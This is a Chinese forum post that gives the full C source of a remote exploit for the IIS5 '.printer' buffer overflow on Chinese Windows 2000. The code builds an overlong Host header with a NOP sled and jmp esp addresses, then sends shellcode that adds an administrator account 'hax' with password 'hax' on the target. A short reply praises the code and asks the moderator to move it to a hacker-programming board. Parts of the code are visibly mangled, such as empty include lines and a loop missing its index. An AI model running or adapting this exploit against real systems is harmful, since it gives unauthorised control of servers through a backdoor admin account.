IIS5 中文版.printer远程攻击程序源代码

/*************************************************************/ /* IIS5 中文版.printer远程攻击程序 */ /* 在Win2k Advanced Server(中文版,5.00.2195)上测试成功 */ /* 使用方法：cniis [sp type] */ /* sp type: 0 ---- no SP (default) */ /* 1 ---- SP1 */ /* 如果攻击成功，会在攻击目标机上添加一个Administrators组的 */ /* 用户：hax，密码：hax */ /* */ /* v0.2 增加了对SP1的攻击支持 */ /* */ /* http://isno.yeah.net */ /*************************************************************/ #include #include #include #include #include void usage(char* prog); int main (int argc, char *argv[]) { /* This shellcode add a Administrators User hax */ /* hax's password is also hax, write by isno,5.2001 */ unsigned char shellcode[] = "\x90\x55\x53\x8B\xEC\x33\xDB\x53\x83\xEC\x3C\xB8" "\x6E\x65\x74\x20\x89\x45\xC3\xB8\x75\x73\x65\x72" "\x89\x45\xC7\xB8\x20\x68\x61\x78\x89\x45\xCB\x89" "\x45\xCF\xB8\x20\x2F\x61\x64\x89\x45\xD3\xB8\x64" "\x26\x6E\x65\x89\x45\xD7\xB8\x74\x20\x6C\x6F\x89" "\x45\xDB\xB8\x63\x61\x6C\x67\x89\x45\xDF\xB8\x72" "\x6F\x75\x70\x89\x45\xE3\xB8\x20\x41\x64\x6D\x89" "\x45\xE7\xB8\x69\x6E\x69\x73\x89\x45\xEB\xB8\x74" "\x72\x61\x74\x89\x45\xEF\xB8\x6F\x72\x73\x20\x89" "\x45\xF3\xB8\x68\x61\x78\x20\x89\x45\xF7\xB8\x2F" "\x61\x64\x64\x89\x45\xFB\x8D\x45\xC3\x50\xB8\xAD" "\xAA\x01\x78\xFF\xD0\x8B\xE5\x5B\x5D\x03\x03\x03"; char sploit[857]; char request[]="GET /NULL.printer HTTP/1.0"; char *finger; int i,X,sock; int sp=0; unsigned short serverport=htons(80); struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr attack; WORD werd; WSADATA wsd; werd= MAKEWORD(2,0); WSAStartup(werd,&wsd); if(argc<2||argc>3) usage(argv[0]); if(argc==3) sp=atoi(argv[2]); nametocheck = gethostbyname (argv[1]); memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4); memset(sploit,0x00,857); strcpy(sploit,request); finger=&sploit[26]; *(finger++)=0x0d; *(finger++)=0x0a; *(finger++)='H'; *(finger++)='o'; *(finger++)='s'; *(finger++)='t'; *(finger++)=':'; *(finger++)=' '; for(i=0;i<268;i++) *(finger++)=(char)0x90; if(sp==0) { /* jmp esp in User32.dll(5.0.2180.1)*/ *(finger++)=(char)0x2a; *(finger++)=(char)0xe3; *(finger++)=(char)0xe2; *(finger++)=(char)0x77; } else { *(finger++)=(char)0x8b; *(finger++)=(char)0x89; *(finger++)=(char)0xe6; *(finger++)=(char)0x77; } *(finger++)=(char)0x90; *(finger++)=(char)0x90; *(finger++)=(char)0x90; *(finger++)=(char)0x90; for(i=0;shellcode!=0x00;i++) *(finger++)=shellcode; *(finger++)=0x0d; *(finger++)=0x0a; *(finger++)=0x0d; *(finger++)=0x0a; *(finger++)=0x00; /* printf(sploit); */ sock = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr = attack.s_addr; serv_addr.sin_port = serverport; X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); if(X!=0) { printf("Couldn't connect\n",inet_ntoa(attack)); exit(1); } send(sock, sploit, strlen(sploit),0); Sleep(1000); printf("\nSP type: %d\n",sp); printf("\nShellcode sended!\n"); printf("If success,the target host will add a Admin User named hax,its passwd is hax.\n"); printf("Good luck!!!\n\n"); closesocket(sock); return 0; } void usage(char* prog) { printf("\n%s -- IIS5 Chinese version .printer remote exploit\n",prog); printf(" write by isno \n\n"); printf("Usage: %s [sp type] \n",prog); printf("sp type: 0 ---- no SP (default) \n"); printf(" 1 ---- SP1 \n"); exit(1); }

好东西，

斑竹请转到【黑客编程/软件应用】吧。